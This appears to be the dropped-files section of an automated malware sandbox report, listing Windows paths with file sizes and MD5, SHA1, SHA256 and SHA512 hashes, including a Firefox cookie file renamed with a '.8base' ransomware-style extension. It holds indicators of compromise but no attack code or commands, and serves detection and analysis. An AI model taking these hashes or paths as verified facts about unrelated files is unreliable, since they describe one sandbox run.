C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletStoreLogo.png
Filesize174B
MD508de9d6a366fb174872e8043e2384099
SHA1955114d06eefae5e498797f361493ee607676d95
SHA2560289105cf9484cf5427630866c0525b60f6193dea0afacd0224f997ce8103861
SHA51259004a4920d5e3b80b642c285ff649a2ee5c52df25b6209be46d2f927a9c2ab170534ea0819c7c70292534ee08eb90e36630d11da18edba502776fac42872ed0
-
Filesize
10KB
MD5d3c040e9217f31648250f4ef718fa13d
SHA172e1174edd4ee04b9c72e6d233af0b83fbfc17dc
SHA25652e4a039e563ee5b63bbf86bdaf28c2e91c87947f4edeebb42691502cb07cbd7
SHA512e875f1ff68a425567024800c6000a861275c5b882f671178ca97d0dbf0dda2bdd832f38f02138a16817871aa2ddb154998987efc4a9b49ccaac6a22a9713a3d7
-
Filesize
36KB
MD5590c906654ff918bbe91a14daac58627
SHA1f598edc38b61654f12f57ab1ddad0f576fe74d0d
SHA2565d37fbfe7320aa0e215be9d8b05d77a0f5ace2deec010606b512572af2bb4dfc
SHA51298a50429b039f98dd9adda775e7d2a0d51bb2beea2452247a2041e1f20b3f13b505bcdeecd833030bbecb58f74a82721cc577932dec086fff64ecef5432e8f9a
-
Filesize
405KB
MD56161c69d5d0ea175d6c88d7921e41385
SHA1088b440405ddba778df1736b71459527aca63363
SHA2568128dff83791b26a01ce2146302f1d8b1159f4943844ab325522cf0fc1e2597e
SHA512cba6e3d1fcb3147193adde3b0f4a95848996999180b59e7bdf16e834e055261cf53548c3972e84d81f840d862c5af53d44945cf4319f24705aecc7d47d1cda07
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Wallet-Package~31bf3856ad364e35~amd64~de-DE~10.0.15063.0.cat
Filesize8KB
MD56523a368322f50d964b00962f74b3f65
SHA15f360ae5b5b5e76f390e839cf1b440333506e4e8
SHA256652687424e20a2d6c16ea15ae653150467cfae4993d5ca28dc30106ff8a0ca67
SHA512210737efc4e2775f261b0dc00ca1ad2aa1a7630633688c5bb9190fa5ff791e9757bbae190f4f7e931f8a4c7e4acf1effce479fdafd3952777ee40d08bdf1c046
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Wallet-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat
Filesize8KB
MD5be70c63aeccef9f4c5175a8741b13b69
SHA1c5ef2591b7f1df2ecbca40219d2513d516825e9a
SHA256d648d365d08a7c503edc75535a58f15b865f082b49355254d539a41bf3af87ff
SHA512b93bf53a5c71a587df7b59fdcaf8046c47e5d82838666ca12e6f56e26c0b9223edf7bf3dbb9352d5718486c531e34a060a05d7924896ab3b6d370dd4ef262186
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Wallet-Package~31bf3856ad364e35~amd64~es-ES~10.0.15063.0.cat
Filesize8KB
MD5463a0532986607cb1ad6b26e94153c05
SHA19aa5b80581530693c1f3cb32a1e107532a2a1a96
SHA256e07a11415f11c98fa5d6e8fb8baa515be4fd071d3528910273efcbec9e882075
SHA512a004a39ec97d816f7e2f43cd4b1bd52acbdbc5f358a5bfe6d997bfed223af2b9a9653fee8fb57e0d4ed11135802a49b85a8286a8119996a4ed88c78f641b1f80
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Wallet-Package~31bf3856ad364e35~amd64~fr-FR~10.0.15063.0.cat
Filesize8KB
MD58f1ab8d6a77c7c01da26f26ddfe8b0f6
SHA14cae8a293cdf2b439dcd915ab070d9d94855411e
SHA256f21e412d461eb8138fdc0f4f25d66882deed8c2498a2cbd764de5be116548a52
SHA51217204b39b08a1275962949acb45b8f12d2d9f57ce49b16d369c58630fa185ac213ed87590dd8bc438e6bc1d477460c604bc346608744e526180b50c6f5e0a5aa
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Wallet-Package~31bf3856ad364e35~amd64~it-IT~10.0.15063.0.cat
Filesize8KB
MD51ece20c692f338709ea3b121feb5ad38
SHA1e5eb5b5cc4acb056088c6874e8b415d5c72c4d63
SHA2567240a7307734a427de9afecd44929e13ae4d2bb1d1ea7c45806b809d43ac7d4a
SHA512c7cb73e3bf8504860546c365b2d2ce112855f5b7d746c6ae889e21f0cfa9abead94dfe090268fd9e07314cb292a9ade5f6b7a37e7bfeea15c1b740c5bccdbdcf
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Wallet-Package~31bf3856ad364e35~amd64~ja-JP~10.0.15063.0.cat
Filesize8KB
MD5d93ac1e6d7078f07ab83a2c96dfc71d9
SHA15326a1b1b3c9b950134b3d05a755355b07881a2b
SHA2560e44999d33b50a526870b2d7210e7abd46696dc469a698fc52372104169098f6
SHA512cab43acf474ec02753d0fd062791bad49b46bb63e1968b00eed566b7fc9cd73f089a84817f741ece99a895ea59206041904e68bc8a68ad6ff6287d5687c786fd
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-Wallet-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat
Filesize10KB
MD5241be6be4b06da4a85f1e110c01427c6
SHA142ee3232b1c182159696f66c15800a9878177bfb
SHA2561ee08c4f17b4c7bebf42a09f6c5d8cf09257218b30bede48db3045fc8c07bb8f
SHA51271df8d3d84393abd418b9c498960b3faf90d85caf60905961482b3c22c200782f55b6f69e23552c3938fe241baba6ad5d012038890f4ee882a0b824f4e091664
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~de-DE~10.0.15063.0.cat
Filesize9KB
MD57defe9e392b71ddb561f14c55db5e0c7
SHA1c9474a81bdd48067ef8862a0326896921ce50104
SHA256441bccb6966c27b25627a4941fe4889b6962cc94db091593fc776b6be01219e8
SHA512ff19c0a82b829f1eb65f861a539b2e92891f72bc6f5d6645c2b136ef5c1c237064efbe70c51bfd864c80af1f0655f9e34756ce44eac884bd0a37ae27ffd30dc4
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~en-US~10.0.15063.0.cat
Filesize9KB
MD552da87ceed52ee597076e58c7ffda14a
SHA1655c2bf68d4cf2185a22a47018a075a3d32ff9c8
SHA256aae12e25aded994b7024d858eab9aea235e6483ad5402a954b4ee8c5c2fbbf6a
SHA512cd10a710f9fa38c5fc511b6c70820d9141e0e386b2dd3afccfcec464acc48e7dc4df99d7dffad7c6998293f81a5283e5696657f370d3ff7e565caf366a04c959
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~es-ES~10.0.15063.0.cat
Filesize9KB
MD5faa07d386fa388cf5a897b2351a7f162
SHA135dd781658d43bd7d03e37f9dee0cc4f2f7402d0
SHA256a063565058df9e6b85b83793c00f86581fca7609b1ac5d3f55bbcf4c952147ca
SHA5127a29302ead2b150b6915138b87d993e3cfd2c407cad25b7a2feb7c95684669d1013fe9f2aaf1ad13c9f6d68da39c93136caecf5181df078497aa82e5079bf14f
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~fr-FR~10.0.15063.0.cat
Filesize9KB
MD537e04504eefeaa903ffa7fb0c24bcdbb
SHA1daf031d3443403fb9f72914c0d7b4666387e8cd8
SHA256276ac2696d33b9c8adba95b101b6a6e5f9eceac02d946c4a44e83e251623c0ca
SHA512fe297a3902930dd0b123e479bc66ccab161141136b27d061e740db24c2eccf8af256bc1a6d35b846e8c1e22df1981240c459c4835b602be4acc7aedfa4220ec8
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~it-IT~10.0.15063.0.cat
Filesize9KB
MD5223900b8b7825546e2c1389f2f4a8cdf
SHA1e22eddbd0bd376fde856b067029366aeb6ef5554
SHA2565cc3ba2a72a56bdf076b9a449d90dd74622b11c579f033f3140f9df9c71206a8
SHA512d88f0845622ed2279b9d3ee152718ba4e8833d6223c61036af788efe4bc54856397a5c7d8b50f8d62f554a38d8b7496288ade480fe0858a99a16ddbb7b815680
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~ja-JP~10.0.15063.0.cat
Filesize9KB
MD5ece0e04531339b5ebdb219a020271a31
SHA1d41d60d509bc7d7609cff9c4ddf0f2a081bf693d
SHA256b65acfbc6f3b283d8e3eee8b13037c3352d04b6f54d8e200fc447a5461ed81ee
SHA512963e64a619ab61cc1f509960c984f9d360d48d33a6e0f9b2017c9a8b3ced3417f0e4018a00ed1d53422c3fd3a48acf5b3ac3e54eb5e37dd1d7e189bd697b9be0
-
C:\Users\Admin\AppData\Local\Temp\AB3F\C\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-OneCore-WalletService-Package~31bf3856ad364e35~amd64~~10.0.15063.0.cat
Filesize9KB
MD5a9abbef73b73f5bf5e7977f321c36196
SHA110e9384112055f3f5143c41b075fbed6b73b3888
SHA2563b1a919987516ab7b9c7877bb0804cf37752466d39af71cce0a4af0415379375
SHA5122d98512f538a6aa91eba847365c5104b8dd28badbf0aa3b74fca8ab209c84d69295982e3194847df40c955deee6eb8b9888b5cb7bce79abb648f6ce62a666323
-
Filesize
798KB
MD590aadf2247149996ae443e2c82af3730
SHA1050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be
-
Filesize
798KB
MD590aadf2247149996ae443e2c82af3730
SHA1050b7eba825412b24e3f02d76d7da5ae97e10502
SHA256ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
SHA512eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\k1y5d1fh.default-release\cookies.sqlite.id[DE7B6091-3483].[[email protected]].8base
Filesize96KB
MD5fe3d652338ab1f4bf014546205fed84c
SHA1fd0da3a29fc74754c2352f7d7dcd1e83d0eb9c97
SHA256ac0df643c327cd637375b76668225923683fee7bde65bd613a1896a656fa6aff
SHA51279c46b483192fd30ebec709d8382030247e21c01548bb6dc175096616bfb73a4050b9d5fa8f416ad47a22b4a432b853775042f63984ab2c7777b7c155523bb62
-
Filesize
254KB
MD5fbc9ef363866fd3cff2615aebc2c8f6d
SHA17da7f54de775050eb6eb1410e24abf36c4d0c45c
SHA25684365b5b998124dd5206ccdda3fb0f808ef4b4a6aebebcbd135e8d9193e197f9
SHA5129ec578237e7857e8015b981b0c2842494ee0766a8ce605ed0b06b55f0036d46145b61d8b71c3843f94b92dc4aa20617b07d8d6dc7c38d83099533567da46692e
-
Filesize
254KB
MD5fbc9ef363866fd3cff2615aebc2c8f6d
SHA17da7f54de775050eb6eb1410e24abf36c4d0c45c
SHA25684365b5b998124dd5206ccdda3fb0f808ef4b4a6aebebcbd135e8d9193e197f9
SHA5129ec578237e7857e8015b981b0c2842494ee0766a8ce605ed0b06b55f0036d46145b61d8b71c3843f94b92dc4aa20617b07d8d6dc7c38d83099533567da46692e
-
Filesize
254KB
MD5fbc9ef363866fd3cff2615aebc2c8f6d
SHA17da7f54de775050eb6eb1410e24abf36c4d0c45c
SHA25684365b5b998124dd5206ccdda3fb0f808ef4b4a6aebebcbd135e8d9193e197f9
SHA5129ec578237e7857e8015b981b0c2842494ee0766a8ce605ed0b06b55f0036d46145b61d8b71c3843f94b92dc4aa20617b07d8d6dc7c38d83099533567da46692e